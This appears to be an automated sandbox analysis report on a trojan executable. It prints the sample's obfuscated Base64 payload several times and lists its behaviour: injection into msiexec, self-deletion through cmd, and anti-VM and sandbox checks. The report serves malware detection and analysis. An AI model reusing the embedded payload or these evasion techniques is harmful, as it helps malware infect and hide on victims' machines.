              Source: 4pFzkB6ePK.exe, LogIn.csBase64 encoded string: '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
              Source: 5.2.4pFzkB6ePK.exe.e40000.1.unpack, LogIn.csBase64 encoded string: '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
              Source: 5.0.4pFzkB6ePK.exe.e40000.0.unpack, LogIn.csBase64 encoded string: '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
              Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@9/5
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4pFzkB6ePK.exe.logJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6468:120:WilError_01
              Source: 4pFzkB6ePK.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: 4pFzkB6ePK.exe, 00000002.00000002.227758190.0000000002651000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
              Source: 4pFzkB6ePK.exe, 00000002.00000002.227758190.0000000002651000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
              Source: 4pFzkB6ePK.exeVirustotal: Detection: 22%
              Source: 4pFzkB6ePK.exeReversingLabs: Detection: 27%
              Source: unknownProcess created: C:\Users\user\Desktop\4pFzkB6ePK.exe 'C:\Users\user\Desktop\4pFzkB6ePK.exe'
              Source: unknownProcess created: C:\Users\user\Desktop\4pFzkB6ePK.exe C:\Users\user\Desktop\4pFzkB6ePK.exe
              Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
              Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\4pFzkB6ePK.exe'
              Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess created: C:\Users\user\Desktop\4pFzkB6ePK.exe C:\Users\user\Desktop\4pFzkB6ePK.exe
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\4pFzkB6ePK.exe'
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: 4pFzkB6ePK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: 4pFzkB6ePK.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Source: Binary string: msiexec.pdb source: 4pFzkB6ePK.exe, 00000005.00000002.285616427.0000000001678000.00000004.00000020.sdmp
              Source: Binary string: msiexec.pdbGCTL source: 4pFzkB6ePK.exe, 00000005.00000002.285616427.0000000001678000.00000004.00000020.sdmp
              Source: Binary string: wntdll.pdbUGP source: 4pFzkB6ePK.exe, 00000005.00000002.285884616.0000000001A2F000.00000040.00000001.sdmp, msiexec.exe, 0000000B.00000002.475468589.0000000004BD0000.00000040.00000001.sdmp
              Source: Binary string: wntdll.pdb source: 4pFzkB6ePK.exe, msiexec.exe

              Data Obfuscation:

              barindex
              .NET source code contains potential unpackerShow sources
              Source: 4pFzkB6ePK.exe, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.2.4pFzkB6ePK.exe.e40000.1.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.0.4pFzkB6ePK.exe.e40000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0041B3F2 push eax; ret
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0041B3FB push eax; ret
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0041B3A5 push eax; ret
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0041B45C push eax; ret
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0041C468 push ss; iretd
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_00415FB5 push eax; retf
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0198D0D1 push ecx; ret
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C4D0D1 push ecx; ret
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00CEB3FB push eax; ret
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00CEB3F2 push eax; ret
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00CEB3A5 push eax; ret
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00CEB45C push eax; ret
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00CEC468 push ss; iretd
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00CE5FB5 push eax; retf
              Source: initial sampleStatic PE information: section name: .text entropy: 7.42579480649
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

              barindex
              Yara detected AntiVM_3Show sources
              Source: Yara matchFile source: 00000002.00000002.227758190.0000000002651000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 4pFzkB6ePK.exe PID: 6484, type: MEMORY
              Source: Yara matchFile source: 2.2.4pFzkB6ePK.exe.26d4938.1.raw.unpack, type: UNPACKEDPE
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
              Source: 4pFzkB6ePK.exe, 00000002.00000002.227758190.0000000002651000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
              Source: 4pFzkB6ePK.exe, 00000002.00000002.227758190.0000000002651000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
              Source: 4pFzkB6ePK.exe, 00000002.00000002.227758190.0000000002651000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
              Tries to detect virtualization through RDTSC time measurementsShow sources
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
